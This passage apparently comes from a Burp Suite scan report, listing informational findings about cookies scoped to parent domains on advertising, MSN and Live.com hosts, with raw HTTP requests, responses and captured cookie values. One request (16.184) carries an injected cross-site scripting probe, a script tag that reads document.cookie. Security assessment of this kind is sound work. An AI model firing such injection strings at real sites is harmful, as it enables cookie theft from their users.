<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://c">here</a>.</h2>
</body></html>

16.174. http://r1-ads.ace.advertising.com/site=730461/size=728090/u=2/bnum=12110217/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmsn.whitepages.com%252F

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=730461/size=728090/u=2/bnum=12110217/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmsn.whitepages.com%252F

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=730461/size=728090/u=2/bnum=12110217/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmsn.whitepages.com%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=izJRNJpwIg02FQFCdbdBUhwUwXAVI8Y4FQFCYTeBUhQ3gZAVIQTnGQFCF2pBUhAohXAVIYZ4FQFCKGeBUhwohXAVIca4FQFCiGeBUhQshXAVwOYAM/oxqI7YCwAoGJ1r1RQcKaEOGK2AI9YxxN53EkL3FkzgPXw6TVQXsumB/0mhqca7HIaWGeQrMew41ZMFkq1B6bjhUq6bDwWZGJ7r4jQsMa4LwaHCW8ohv0I9IsfzFEzsNiQQoaAV; F1=B0OnE1EBAAAABAAAAQAAABA; BASE=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!; ROLL=v5Q240Mxxgzq7NHhPfc3j1yoZKJiMdPbC8fCEdd30GSObC6lkwnqVseu4g1vniv3XYjqYjceyxkwf2tMZSArEQlir5SS2/75sJgaoYVesLytCxbvY9DUCszhatMCKKwTxRIWF+0xTPXT252NsY5JKsYLPWTZUUAXm9JaMAw20vf/mP2cRTHaOgTEMLuyHJXb5Jy8EkMSABMBHiu8OMTbFF6Xd8eJ5ajIEo7MWwYYM2j4u/xo2g3M8yNIsgpaMiSPRegy+4TZaJX30vjsTyS3GGK9P94DueQl+0oOsMvcs3UfJHgL6pNMJ9Bbex1jgMttsrIbsgzmOICEVCga7PcFY4BTH+j6pLnQtbzK/VM!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.950192.730461.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 01:29:43 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 593
Date: Sun, 30 Jan 2011 01:29:43 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; domain=advertising.com; expires=Tue, 29-Jan-2013 01:29:43 GMT; path=/
Set-Cookie: F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; domain=advertising.com; expires=Tue, 29-Jan-2013 01:29:43 GMT; path=/
Set-Cookie: BASE=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!; domain=advertising.com; expires=Tue, 29-Jan-2013 01:29:43 GMT; path=/
Set-Cookie: ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!; domain=advertising.com; expires=Tue, 29-Jan-2013 01:29:43 GMT; path=/
Set-Cookie: 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click

document.write('<script LANGUAGE="JavaScript1.1"');document.write('SRC="http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90?http://r1-ads.ace.advertising.com/click/site=000073
...[SNIP]...

16.175. http://realestate.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.redacted
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:34 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA09
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=3caf83355b934bd3a1c3218117df8e52; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=2B753083113044228D3A08B4704A491E; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:34 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 40767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.176. http://realestate.redacted/OmRedir.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.redacted
Path:   /OmRedir.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OmRedir.aspx HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:42 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA14
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=c7e4694c7e8948a0a852cd53f852c2cd; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=E61C86B6F829406795830566D6BAA5ED; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:42 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 7348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://
...[SNIP]...

16.177. http://realestate.redacted/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.redacted
Path:   /article.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /article.aspx HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:38 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA09
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=93ed9493a41741609bf76926d6d18474; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=BB4451F20548401188ACB52B32195513; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:38 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 52241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.178. http://realestate.redacted/slideshow.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.redacted
Path:   /slideshow.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /slideshow.aspx HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:37 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA15
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=743d5dfc20ea49fc927bbf5e52addae3; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=D11A40DFEBAF4362805A6A47E91AD76D; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:35 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 50044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.179. http://redtape.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redtape.newsvine.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: redtape.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:18:21 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=3df9ab73640c1ed44c1858b2a3c651a7; expires=Sat, 25-Jan-2031 02:18:21 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 65847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...

16.180. https://sb.voicefive.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sb.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b HTTP/1.1
Host: sb.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: https://sb.voicefive.com/b2?
Date: Sun, 30 Jan 2011 01:37:06 GMT
Connection: close
Set-Cookie: UID=c9bed8b-173.223.190.110-1296351426; expires=Tue, 29-Jan-2013 01:37:06 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


16.181. http://search.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.redacted
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: search.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Content-Length: 0
Location: http://www.bing.com/
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
X-Akamai-TestID: eb356f92ec934ef7abb977318c2c1fa7
Expires: Sun, 30 Jan 2011 01:37:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 30 Jan 2011 01:37:08 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1296351428; domain=.redacted; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.redacted; path=/


16.182. https://security.live.com/LoginStage.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://security.live.com
Path:   /LoginStage.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /LoginStage.aspx?lmif=1000&ru=https://login.live.com/login.srf%3Fwa%3Dwsignin1.0%26rpsnv%3D11%26ct%3D1296342524%26rver%3D6.1.6206.0%26wp%3DMBI%26wreply%3Dhttp:%252F%252Fmail.live.com%252F%253Frru%253Dhome%2526livecom%253D1%26id%3D251248%26cbcxt%3Dhom%26vv%3D900%26mkt%3DEN-US%26lc%3D1033&wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&cbcxt=hom&vv=900&mkt=EN-US&lc=1033&cbid=0&id=64855 HTTP/1.1
Host: security.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:13:56 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: TK2IDSTOOL1B06 V: 0
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
Set-Cookie: mkt=ep=en-US; domain=.live.com; path=/
Set-Cookie: ASP.NET_SessionId=h2apx4z4mmbean55o3laku45; path=/; HttpOnly
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 1396


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

</title></h
...[SNIP]...

16.183. https://security.live.com/LoginStage.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://security.live.com
Path:   /LoginStage.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /LoginStage.aspx HTTP/1.1
Host: security.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 29 Jan 2011 23:13:42 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: TK2IDSTOOL1B06 V: 0
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
X-UA-Compatible: IE=7
Set-Cookie: ASP.NET_SessionId=bh2zle2prh4zk145gn1nyx45; path=/; HttpOnly
Set-Cookie: xid=ef438ff2-3226-4bb0-84b7-a945e2ffe5ee&&TK2xxxxxxx1B06&61; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: mktstate=S=783525862&U=&E=&P=&B=en; domain=.live.com; path=/
Set-Cookie: mkt1=norm=en; domain=.live.com; path=/
Set-Cookie: mkt2=marketing=en-us; domain=.security.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Sat, 29-Jan-2011 21:33:42 GMT; path=/
Set-Cookie: wlv=A|_-d:s*phzLBQ.2+1+0+3; domain=.live.com; path=/
Set-Cookie: PreScript=; path=/
Set-Cookie: E=P:+L7nTSGOzYg=:BemJ+zHQEPLPNnFkDqtAse01gEABPmRe8NpO46JTjNc=:F; domain=.live.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 29054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text
...[SNIP]...

16.184. http://seg.admailtiser.com/st

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.admailtiser.com
Path:   /st

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /st?cijs=1&cipid=8601&ttype=0&seg=86011&pixels=8601&cirf=http%3A%2F%2Fwww.reimage.com%2Flp%2Fnhome%2Findex.php%3Ftracking%3DNeudesic69f18%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E602f708c63d%26banner%3D%26banner%3D728x90-1%5C%26adgroup%3Ddirect%26ads_name%3Ddirect%26keyword%3Ddirect&ciprf=http%3A%2F%2Fburp%2Fshow%2F9 HTTP/1.1
Host: seg.admailtiser.com
Proxy-Connection: keep-alive
Referer: http://www.reimage.com/lp/nhome/index.php?tracking=Neudesic69f18%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E602f708c63d&banner=&banner=728x90-1\&adgroup=direct&ads_name=direct&keyword=direct
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cicouid=cc7abda8-722d-4cd3-b76a-29b02a48647arcjRQOvWHnoil_sqd2OXzw; ciconv0=6940311042157494960$8601-c1fe3893-3748-4f39-bb7c-f9bd561f5dc2

Response

HTTP/1.1 302 Moved Temporarily
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://admailtiser.com/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR UNI"
Set-Cookie: ciconv0=6940311042157494960$8601-b691916b-c3bc-4ec5-b037-99e1592c243a; Domain=.admailtiser.com; Expires=Mon, 31-Jan-2011 01:23:54 GMT; Path=/
P3P: policyref="http://admailtiser.com/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR UNI"
Set-Cookie: ciconv1=6940311042157494960$8601-c1fe3893-3748-4f39-bb7c-f9bd561f5dc2; Domain=.admailtiser.com; Expires=Mon, 31-Jan-2011 01:23:54 GMT; Path=/
Location: http://ib.adnxs.com/seg?member=104&add_code=86011
Content-Length: 0
Date: Sun, 30 Jan 2011 01:23:53 GMT
Server: Apache


16.185. https://signup.live.com/signup.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://signup.live.com
Path:   /signup.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /signup.aspx?ru=http%3a%2f%2fmail.live.com%2f%3frru%3dinbox&wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&lc=1033&id=251248&cbcxt=hom&mkt=en-US&bk=1296342737&cru=https://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d11%26rver%3d6.1.6206.0%26wp%3dMBI%26wreply%3dhttp:%252F%252Fmail.live.com%252F%253Frru%253Dhome%2526livecom%253D1%26lc%3d1033%26id%3d251248%26cbcxt%3dhom%26mkt%3den-US HTTP/1.1
Host: signup.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&checkda=1&ct=1296342838&rver=6.1.6206.0&wp=MBI_SSL&wreply=https:%2F%2Fsignup.live.com%2Fsignup.aspx%3Fru%3Dhttp%253a%252f%252fmail.live.com%252f%253frru%253dinbox%26wa%3Dwsignin1.0%26rpsnv%3D11%26ct%3D1296342524%26rver%3D6.1.6206.0%26wp%3DMBI%26wreply%3Dhttp:%252F%252Fmail.live.com%252F%253Frru%253Dhome%2526livecom%253D1%26lc%3D1033%26id%3D251248%26cbcxt%3Dhom%26mkt%3Den-US%26bk%3D1296342737%26cru%3Dhttps:%2F%2Flogin.live.com%2Flogin.srf%253fwa%253dwsignin1.0%2526rpsnv%253d11%2526rver%253d6.1.6206.0%2526wp%253dMBI%2526wreply%253dhttp:%25252F%25252Fmail.live.com%25252F%25253Frru%25253Dhome%252526livecom%25253D1%2526lc%253d1033%2526id%253d251248%2526cbcxt%253dhom%2526mkt%253den-US%26lic%3D1&lc=1033&id=68692
Server: Microsoft-IIS/7.0
Set-Cookie: mkt=ep=en-US; domain=.live.com; path=/; secure
Set-Cookie: xid=ffbfad06-ce49-4990-af01-ca3897d55b66&&CO1xxxxxxC208&61; domain=.live.com; path=/; secure
Set-Cookie: xidseq=1; domain=.live.com; path=/; secure
Set-Cookie: mktstate=S=-1109498027&U=&E=en-us&B=en&P=; domain=.live.com; path=/; secure
Set-Cookie: mkt1=norm=en-us; domain=.live.com; path=/; secure
Set-Cookie: mkt2=marketing=en-us; domain=.signup.live.com; path=/; secure
Set-Cookie: LD=; domain=.live.com; expires=Sat, 29-Jan-2011 21:33:58 GMT; path=/; secure
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Date: Sat, 29 Jan 2011 23:13:57 GMT
Connection: close
Content-Length: 919

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;checkda=1&amp;ct=1296342838&amp;rver=6.1.6206.0&amp;w
...[SNIP]...

16.186. https://signup.live.com/signup.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://signup.live.com
Path:   /signup.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /signup.aspx HTTP/1.1
Host: signup.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&checkda=1&ct=1296342837&rver=6.1.6206.0&wp=MBI_SSL&wreply=https:%2F%2Fsignup.live.com%2Fsignup.aspx%3Flic%3D1&lc=1033&id=68692
Server: Microsoft-IIS/7.0
Set-Cookie: ipl=c=8SNt4URhbGxhc3xOb3J0aCBBbWVyaWNhfFVuaXRlZCBTdGF0ZXN8dXN8MzIuNzk5OTk5fC05Ni43ODcwMDJ8NzUyMDd8U291dGggQ2VudHJhbHxUZXhhcw&v=2; domain=.live.com; path=/; secure; HttpOnly
Set-Cookie: xid=edb93499-9e17-4a85-b8d1-8d8140696b6f&&CO1xxxxxxC107&61; domain=.live.com; path=/; secure
Set-Cookie: xidseq=1; domain=.live.com; path=/; secure
Set-Cookie: mktstate=S=-1109498027&U=&E=&P=&B=en; domain=.live.com; path=/; secure
Set-Cookie: mkt1=norm=en; domain=.live.com; path=/; secure
Set-Cookie: mkt2=marketing=en-us; domain=.signup.live.com; path=/; secure
Set-Cookie: LD=; domain=.live.com; expires=Sat, 29-Jan-2011 21:33:57 GMT; path=/; secure
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Date: Sat, 29 Jan 2011 23:13:57 GMT
Connection: close
Content-Length: 331

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;checkda=1&amp;ct=1296342837&amp;rver=6.1.6206.0&amp;w
...[SNIP]...

16.187. http://social.entertainment.redacted/bloglist.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.entertainment.redacted
Path:   /bloglist.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bloglist.aspx HTTP/1.1
Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:49 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA52
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=339e672cfcfc4e9bb100367db460c745; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=32E934AA60CC44708EAEB1A4EA677746; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:49 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 49248

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.188. http://social.entertainment.redacted/movies/blogs/the-hitlist-blog.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.entertainment.redacted
Path:   /movies/blogs/the-hitlist-blog.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /movies/blogs/the-hitlist-blog.aspx?feat=04db8167-2807-4c60-b794-b60b92d90ea8 HTTP/1.1
Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:51 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA50
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=70a16c71a55c4c61a3a1f7e96fd37f9b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=496C3F39553B4397A714AABA23E48508; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:51 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 48741

